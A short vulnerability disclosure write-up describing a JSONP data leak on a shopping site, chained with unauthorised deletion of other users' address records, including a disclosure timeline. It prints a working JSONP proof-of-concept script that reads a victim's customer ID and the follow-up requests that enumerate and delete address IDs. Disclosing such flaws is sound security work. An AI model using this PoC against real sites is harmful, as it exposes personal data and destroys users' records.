Jsonp+Excessive deletion Vul

  • A+
所属分类:安全文章

1、First I found the address of the website that leaked the user id.

jQuery111308705583230454748_1548063320659({"responseCode":"200","responseDesc":"success","responseData":{"cust":{"customerGuid":"df73d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"YongShao","gender":2,"country":"CN","countryName":"China","province":"CN-12","provinceName":"****","city":"CN-12-001","cityName":"****","telephone":"1***********","email":""}}})


Then I constructed the jsonp's poc to get the victim's id.


<script>function jQuery111308705583230454748_1548063320659(d) {alert(d['responseData']['cust']['customerGuid']);}</script><script type="text/javascript"src="https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getServiceCust/1000jsonp=jQuery111308705583230454748_1548063320659&accountId=&source=100000007&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&language=zh-cn&siteCode=zh_CN&_=1548063320660"></script>


got it

Jsonp+Excessive deletion Vul



2、Then I found that I can use the id splicing to get the user address id.


https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getContactList/1000?jsonp=jQuery111308705583230454748_1548063320661&source=100000007&customerGuid=df73d476-5f1d-e911-80ff-*******&language=zh-cn&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&siteCode=zh_CN&_=1548063320667


response:

jQuery111308705583230454748_1548063320661({"responseData":{"list":[{"customerGuid":"df73d476-5f1d-e911-80ff-******","contactAddressId":"e973d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"tset","country":"CN","province":"CN-12","city":"CN-12-001","district":"CN-12-001-02","isDefault":"N","createdon":"2019-01-21 03:45:04","countryName":"China","provinceName":"*****","cityName":"*****","districtName":"***","telephone":"131********","postCode":"","address":"*****"}]},"responseCode":"200","responseDesc":"success"})


contactAddressId This parameter is the address



3、Try to use this information to delete on the B account


F12 find delete button

<a data-contactaddressid="e973d476-5f1d-e911-80ff-******" class="delete-btn under-line" href="javascript:;">Del</a>


Then return to the A account to confirm whether the deletion was successful. Observe through the jsonp interface

Jsonp+Excessive deletion Vul



  • TimeLine

2019.01.21 Report Vul

2019.01.22 Received a vulnerability and transferred processing

……(I don't know when it was fixed.)

2019.02.19 Published paper

本文始发于微信公众号(逢人斗智斗勇):Jsonp+Excessive deletion Vul

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: